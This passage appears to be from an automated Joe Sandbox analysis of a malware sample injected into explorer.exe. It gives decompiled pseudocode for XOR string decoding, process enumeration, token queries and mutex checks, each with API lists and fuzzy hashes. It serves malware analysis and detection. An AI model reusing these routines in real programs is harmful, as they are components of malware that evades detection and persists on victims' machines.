                                                                                                                                                                        						L10:
                                                                                                                                                                        						_t62 = _t37;
                                                                                                                                                                        						_t57 = _t76;
                                                                                                                                                                        						if(_t62 == 0) {
                                                                                                                                                                        							L12:
                                                                                                                                                                        							lstrlenA( &_v36);
                                                                                                                                                                        							_t41 = E007A8BDE(2 + _t54 * 2); // executed
                                                                                                                                                                        							_t70 = _t41;
                                                                                                                                                                        							if(_t70 != 0) {
                                                                                                                                                                        								if(_t54 == 0) {
                                                                                                                                                                        									L17:
                                                                                                                                                                        									return _t70;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t59 = _a12;
                                                                                                                                                                        								do {
                                                                                                                                                                        									 *((short*)(_t70 + _t76 * 2)) = ( *(_t59 % _v16 + _a4) ^  *(_t59 + _v8)) & 0x000000ff;
                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                        									_t59 = _t59 + 1;
                                                                                                                                                                        								} while (_t76 < _t54);
                                                                                                                                                                        								goto L17;
                                                                                                                                                                        							}
                                                                                                                                                                        							return 0x7bf8fc;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        						}
                                                                                                                                                                        						do {
                                                                                                                                                                        							L11:
                                                                                                                                                                        							_t17 = _t57 + 0x30; // 0x30
                                                                                                                                                                        							 *((char*)(_t77 + _t57 - 0x20)) = _t17;
                                                                                                                                                                        							_t57 = _t57 + 1;
                                                                                                                                                                        						} while (_t57 < _t62);
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					}
                                                                                                                                                                        					do {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						_t37 = _t37 + 1;
                                                                                                                                                                        					} while ( *((char*)(_t77 + _t37 - 0x20)) != 0);
                                                                                                                                                                        					_t62 = 0xe;
                                                                                                                                                                        					if(_t37 <= _t62) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t57 = 0;
                                                                                                                                                                        					goto L11;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t71 = 0x5a;
                                                                                                                                                                        					_t73 = _a12;
                                                                                                                                                                        					if( *((intOrPtr*)(_t74 % _t71 + _a4)) ==  *((intOrPtr*)(_t74 + _v8))) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t74 = _t74 + 1;
                                                                                                                                                                        					if(_t74 < _t60) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L6;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t54 = _t74 - _t73;
                                                                                                                                                                        				goto L6;
                                                                                                                                                                        			}




















                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                                        • String ID: GetCurrentProcess$Z
                                                                                                                                                                        • API String ID: 1659193697-210115490
                                                                                                                                                                        • Opcode ID: 6e64c7b31150ea1428e5e3ed53aa34c56d10be4b9c2984af1be60379a0514511
                                                                                                                                                                        • Instruction ID: 1b4e2697f36822799f9a5c8267a27d90ff064df5f1e1d984052d543eb972018d
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e64c7b31150ea1428e5e3ed53aa34c56d10be4b9c2984af1be60379a0514511
                                                                                                                                                                        • Instruction Fuzzy Hash: C4210CB5B002555BCB15CFA988406ADB7A6FFCA350F284279E9519B341DA78DC0387A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 582 7a89ef-7a8a10 583 7a8a38-7a8a48 582->583 584 7a8a12-7a8a2a 582->584 587 7a8a4a-7a8a4f 583->587 588 7a8a58-7a8a5c 583->588 585 7a8a2c-7a8a30 584->585 586 7a8a34-7a8a36 584->586 585->584 591 7a8a32 585->591 586->583 587->587 592 7a8a51-7a8a56 587->592 589 7a8a6a-7a8a76 lstrlenA 588->589 590 7a8a5e-7a8a68 588->590 593 7a8aba 589->593 594 7a8a78-7a8a7c call 7a8bde 589->594 590->589 590->590 591->583 592->588 592->590 596 7a8abf 593->596 597 7a8a81-7a8a89 594->597 598 7a8ac1-7a8ac5 596->598 599 7a8a8b-7a8a90 597->599 600 7a8a92-7a8a9a 597->600 599->598 601 7a8a9c-7a8ab3 600->601 601->601 602 7a8ab5-7a8ab8 601->602 602->596
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E007A89EF(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a12) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                        				void* _t54;
                                                                                                                                                                        				void* _t57;
                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                        				void* _t63;
                                                                                                                                                                        				void* _t73;
                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                        				void* _t80;
                                                                                                                                                                        
                                                                                                                                                                        				_t77 = _a12;
                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                        				_t57 = 0;
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_t54 = 0;
                                                                                                                                                                        				_v16 = 0x5a;
                                                                                                                                                                        				if(_t77 < __edx) {
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t74 = 0x5a;
                                                                                                                                                                        						_t76 = _a12;
                                                                                                                                                                        						if( *((intOrPtr*)(_t77 % _t74 + _a4)) ==  *((intOrPtr*)(_t77 + _v8))) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t77 = _t77 + 1;
                                                                                                                                                                        						if(_t77 < _v12) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t54 = _t77 - _t76;
                                                                                                                                                                        				}
                                                                                                                                                                        				L5:
                                                                                                                                                                        				_t39 = _t57;
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                        				if(_v28 == _t39) {
                                                                                                                                                                        					L8:
                                                                                                                                                                        					_t63 = _t39;
                                                                                                                                                                        					if(_t63 != 0) {
                                                                                                                                                                        						goto L9;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t39 = _t39 + 1;
                                                                                                                                                                        					} while ( *((intOrPtr*)(_t80 + _t39 - 0x18)) != _t57);
                                                                                                                                                                        					_t63 = 0xe;
                                                                                                                                                                        					if(_t39 > _t63) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							L9:
                                                                                                                                                                        							_t19 = _t57 + 0x30; // 0x30
                                                                                                                                                                        							 *((char*)(_t80 + _t57 - 0x1c)) = _t19;
                                                                                                                                                                        							_t57 = _t57 + 1;
                                                                                                                                                                        						} while (_t57 < _t63);
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				lstrlenA( &_v32);
                                                                                                                                                                        				if(_t54 == 0) {
                                                                                                                                                                        					_t58 = 0x7bf896;
                                                                                                                                                                        					goto L17;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t23 = _t54 + 1; // 0x1
                                                                                                                                                                        					_t44 = E007A8BDE(_t23); // executed
                                                                                                                                                                        					_t60 = _t44;
                                                                                                                                                                        					_v12 = _t60;
                                                                                                                                                                        					if(_t60 != 0) {
                                                                                                                                                                        						_t79 = _a12;
                                                                                                                                                                        						_t61 = _v8;
                                                                                                                                                                        						_t73 = _t60 - _t79;
                                                                                                                                                                        						do {
                                                                                                                                                                        							 *(_t73 + _t79) =  *(_t79 % _v16 + _a4) ^  *(_t79 + _t61);
                                                                                                                                                                        							_t79 = _t79 + 1;
                                                                                                                                                                        							_t54 = _t54 - 1;
                                                                                                                                                                        						} while (_t54 != 0);
                                                                                                                                                                        						_t58 = _v12;
                                                                                                                                                                        						L17:
                                                                                                                                                                        						_t42 = _t58;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t42 = 0x7bf896;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t42;
                                                                                                                                                                        			}
























                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000138,?,007BCA50), ref: 007A8A6E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                                        • String ID: Research$Z
                                                                                                                                                                        • API String ID: 1659193697-3866491824
                                                                                                                                                                        • Opcode ID: 95d2f7bdd901afd07cdc1a9a6ed32d9c8de5e1d21fadcddafd259599d5fbd071
                                                                                                                                                                        • Instruction ID: bd1abba8078e594b08daa14a4a15e64934b9a10bb155cdcc9565570ed6b262e3
                                                                                                                                                                        • Opcode Fuzzy Hash: 95d2f7bdd901afd07cdc1a9a6ed32d9c8de5e1d21fadcddafd259599d5fbd071
                                                                                                                                                                        • Instruction Fuzzy Hash: F131E935B042459FCF58DEAC84401AEBBB6BFDA310F28C67AE945E7341DA34ED428791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E007AB96A(void* __ecx, void* __edx) {
                                                                                                                                                                        				void* _v304;
                                                                                                                                                                        				void* _v308;
                                                                                                                                                                        				intOrPtr _v312;
                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                        				signed int _t17;
                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t43;
                                                                                                                                                                        				void* _t45;
                                                                                                                                                                        
                                                                                                                                                                        				_t33 = __edx;
                                                                                                                                                                        				_v304 = __ecx;
                                                                                                                                                                        				_t16 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                        				_t45 = _t16;
                                                                                                                                                                        				_t17 = _t16 | 0xffffffff;
                                                                                                                                                                        				if(_t45 != _t17) {
                                                                                                                                                                        					E007A8D6D( &_v304, 0, 0x128);
                                                                                                                                                                        					_v304 = 0x128;
                                                                                                                                                                        					if(Process32First(_t45,  &_v304) != 0) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							_t43 = _v312( &_v308, _t33);
                                                                                                                                                                        						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
                                                                                                                                                                        						_t25 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t25 + 0x30))(_t45);
                                                                                                                                                                        						_t17 = 0 | _t43 == 0x00000000;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t30 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t30 + 0x30))(_t45);
                                                                                                                                                                        						_t17 = 0xfffffffe;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t17;
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 007AB988
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 007AB9B8
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,?), ref: 007AB9EB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$CreateFirstNextSnapshotToolhelp32memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3349827152-0
                                                                                                                                                                        • Opcode ID: 98cb6cc3500879afd9d7b3187c78b579499ba9d60d1546e99ec9dbd4dd2af08e
                                                                                                                                                                        • Instruction ID: 6d8e11b72cd36d6eef1ee39e1a81f14d1322c3eac5d27be8089f2a99fac2f3c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 98cb6cc3500879afd9d7b3187c78b579499ba9d60d1546e99ec9dbd4dd2af08e
                                                                                                                                                                        • Instruction Fuzzy Hash: E2119072204701AFC310DB68EC49E9B77ECEF8A760F144B39F665C7191EB28D90587A6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E007AC7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        
                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                        				_t28 = __edx;
                                                                                                                                                                        				_t20 = _t22;
                                                                                                                                                                        				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                        					L6:
                                                                                                                                                                        					_t12 = _t31;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t31 = E007A8BDE(_v8);
                                                                                                                                                                        					_v12 = _t31;
                                                                                                                                                                        					if(_t31 != 0) {
                                                                                                                                                                        						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                        							goto L6;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							E007A8BF4( &_v12, _t16);
                                                                                                                                                                        							goto L3;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t12;
                                                                                                                                                                        			}











                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,007A0000,00000000,00000000,?,007AC876,00000000,00000000,?,007AC89F), ref: 007AC810
                                                                                                                                                                        • GetLastError.KERNEL32(?,007AC876,00000000,00000000,?,007AC89F,00001644,?,007ADFCE), ref: 007AC817
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,007AC876,00000000,00000000,?,007AC89F,00001644,?,007ADFCE), ref: 007AC846
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2499131667-0
                                                                                                                                                                        • Opcode ID: 6b4250790e0ed80806d034de4bc43dff0485ebedd80cc539e208f426f0967053
                                                                                                                                                                        • Instruction ID: 19a570ab30880e69aad331def1ebfe9635656f984203e342f8a75d9ba6e4d8dd
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b4250790e0ed80806d034de4bc43dff0485ebedd80cc539e208f426f0967053
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E0167B2600118BF8B255BA5DC49DAB7FECFF867A07100669F605D6110D67CDD00D7E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E007A5ED4(signed int __eax, CHAR* __ecx, void* __edx) {
                                                                                                                                                                        				intOrPtr* _v0;
                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        
                                                                                                                                                                        				_pop(_t25);
                                                                                                                                                                        				_t20 = __edx;
                                                                                                                                                                        				if(__ecx != 0) {
                                                                                                                                                                        					_t23 = CreateMutexA(0, 1, __ecx);
                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                        						if(GetLastError() != 0xb7 || E007AB149(_t23, _t20) != 0xffffffff) {
                                                                                                                                                                        							_t9 = 1;
                                                                                                                                                                        							 *_v0 = _t23;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t11 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        							 *((intOrPtr*)(_t11 + 0x30))(_t23);
                                                                                                                                                                        							_t9 = 0;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t9 = GetLastError() | 0xffffffff;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t9 = __eax | 0xffffffff;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t9;
                                                                                                                                                                        			}









                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,007A5F36,?,Global,007BCA40,?,00000000,?,00000001), ref: 007AB0FE
                                                                                                                                                                        • GetLastError.KERNEL32(?,007A5F36,?,Global,007BCA40,?,00000000,?,00000001), ref: 007AB10A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1925916568-0
                                                                                                                                                                        • Opcode ID: 6bf1827c8684c8706252edea4276c441a5452ac8a8fec61293e48f9c28bc539e
                                                                                                                                                                        • Instruction ID: 60461dd948e589923b528ebaccc43e49303292668bb9a8f2f444333d451ab395
                                                                                                                                                                        • Opcode Fuzzy Hash: 6bf1827c8684c8706252edea4276c441a5452ac8a8fec61293e48f9c28bc539e
                                                                                                                                                                        • Instruction Fuzzy Hash: C1F022712045089BC7201779EC69B6A36D8EFCB7BAF504775F63ACA1D2EB28C8014391
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AB096(CHAR* __ecx, void* __edx) {
                                                                                                                                                                        				intOrPtr _t8;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        
                                                                                                                                                                        				_t16 = __edx; // executed
                                                                                                                                                                        				_t17 = CreateMutexA(0, 1, __ecx);
                                                                                                                                                                        				if(_t17 != 0) {
                                                                                                                                                                        					if(GetLastError() == 0xb7 && E007AB149(_t17, _t16) < 0) {
                                                                                                                                                                        						_t8 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t8 + 0x30))(_t17);
                                                                                                                                                                        						_t17 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t17;
                                                                                                                                                                        				}
                                                                                                                                                                        				GetLastError();
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}







                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,007A5047,?,?,?,?,?,?,007A53E7,00000000,00000000), ref: 007AB0A4
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,007A53E7,00000000,00000000), ref: 007AB0B0
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,007A53E7,00000000,00000000), ref: 007AB0BA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$CreateMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 200418032-0
                                                                                                                                                                        • Opcode ID: 06b516c0f26b99a68144a40d67af66c847d5090cb235a3d046cb4a1aaf63821d
                                                                                                                                                                        • Instruction ID: 603351b50b40886a91d9e5a74d5c5697b432191d0adc5e912ff1b835eea8eabc
                                                                                                                                                                        • Opcode Fuzzy Hash: 06b516c0f26b99a68144a40d67af66c847d5090cb235a3d046cb4a1aaf63821d
                                                                                                                                                                        • Instruction Fuzzy Hash: F7F0A9313040219BC3202765AC09FAB26AADFC9BA0F028360FA15CB152DB28CC824290
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                        			E007ABE3C(void* __ecx, WCHAR* __edx) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				void _v528;
                                                                                                                                                                        				char _v1046;
                                                                                                                                                                        				void _v1048;
                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                        				intOrPtr _t36;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				intOrPtr _t40;
                                                                                                                                                                        				WCHAR* _t47;
                                                                                                                                                                        				void* _t49;
                                                                                                                                                                        
                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                        				_v8 = 0x104;
                                                                                                                                                                        				_t47 = __edx;
                                                                                                                                                                        				memset( &_v1048, 0, 0x208);
                                                                                                                                                                        				memset( &_v528, 0, 0x208);
                                                                                                                                                                        				_t21 =  *0x7bf82c; // 0xeaf9c8
                                                                                                                                                                        				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
                                                                                                                                                                        				_t49 = E007AC79E(_t39);
                                                                                                                                                                        				_t26 =  *0x7bf84c; // 0xeaf9d8
                                                                                                                                                                        				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
                                                                                                                                                                        				if(_t27 == 0) {
                                                                                                                                                                        					_t33 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					if(E007AC9F4( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
                                                                                                                                                                        						_t36 =  *0x7bf82c; // 0xeaf9c8
                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_t40 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        				 *((intOrPtr*)(_t40 + 0x30))(_t49);
                                                                                                                                                                        				lstrcpynW(_t47,  &_v1046 + E007AA456( &_v528) * 2, 0x104);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}

















                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 007ABE61
                                                                                                                                                                        • memset.MSVCRT ref: 007ABE6F
                                                                                                                                                                          • Part of subcall function 007AC79E: GetCurrentThread.KERNEL32 ref: 007AC7B1
                                                                                                                                                                          • Part of subcall function 007AC79E: GetLastError.KERNEL32(?,?,007AC8E3,00000000,007A0000), ref: 007AC7BF
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 007ABEFA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$CurrentErrorLastThreadlstrcpyn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2264569553-0
                                                                                                                                                                        • Opcode ID: c965a8d62dae649b26210c0fdbb6cab322503f8e5eb4551f339afc07c5b41009
                                                                                                                                                                        • Instruction ID: 3215f0de82483e2dc6eb57ff3f07f2e0b0688308e8866e7fd782b037bf20024c
                                                                                                                                                                        • Opcode Fuzzy Hash: c965a8d62dae649b26210c0fdbb6cab322503f8e5eb4551f339afc07c5b41009
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D2190B2500118AFD720EBA4DC89FEA73FCEF49314F0082A5F605D7152DB789E458B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                        			E007A5EDD(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v52;
                                                                                                                                                                        				intOrPtr _t16;
                                                                                                                                                                        				void* _t19;
                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                        				void* _t42;
                                                                                                                                                                        
                                                                                                                                                                        				_t42 = __edx;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				E007AB557( &_v52, __ecx, __eflags);
                                                                                                                                                                        				_t16 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
                                                                                                                                                                        					L1:
                                                                                                                                                                        					_t27 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					 *((intOrPtr*)(_t27 + 0xc0))(0x32);
                                                                                                                                                                        					goto L1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push( &_v52);
                                                                                                                                                                        				_push("\\");
                                                                                                                                                                        				_v12 = E007A9A07("Global");
                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                        				_t19 = E007A5ED4(_t18, _t18, _t42); // executed
                                                                                                                                                                        				__eflags = _t19 - 1;
                                                                                                                                                                        				if(_t19 == 1) {
                                                                                                                                                                        					FindCloseChangeNotification(_v8);
                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                        					_push( &_v8);
                                                                                                                                                                        					E007A5ED4( &_v8,  &_v52, _t42); // executed
                                                                                                                                                                        				}
                                                                                                                                                                        				E007A8BF4( &_v12, 0xffffffff);
                                                                                                                                                                        				return _v8;
                                                                                                                                                                        			}











                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,00000001), ref: 007A5F46
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID: Global
                                                                                                                                                                        • API String ID: 2591292051-4020866741
                                                                                                                                                                        • Opcode ID: 6ea867de68931dfdcb426fc09526ad2af03eda0bc8958722b85d5b1c56524908
                                                                                                                                                                        • Instruction ID: f2bc0fa7119100205c0a3a474c250de0b983a68f2cb190b5fdc0cc0d36a85ad3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6ea867de68931dfdcb426fc09526ad2af03eda0bc8958722b85d5b1c56524908
                                                                                                                                                                        • Instruction Fuzzy Hash: F2118E72A04108EFCB04EB99EC46DDD77F8EB85710F20826AF405E7291DA349F00C754
                                                                                                                                                                        Uniqueness

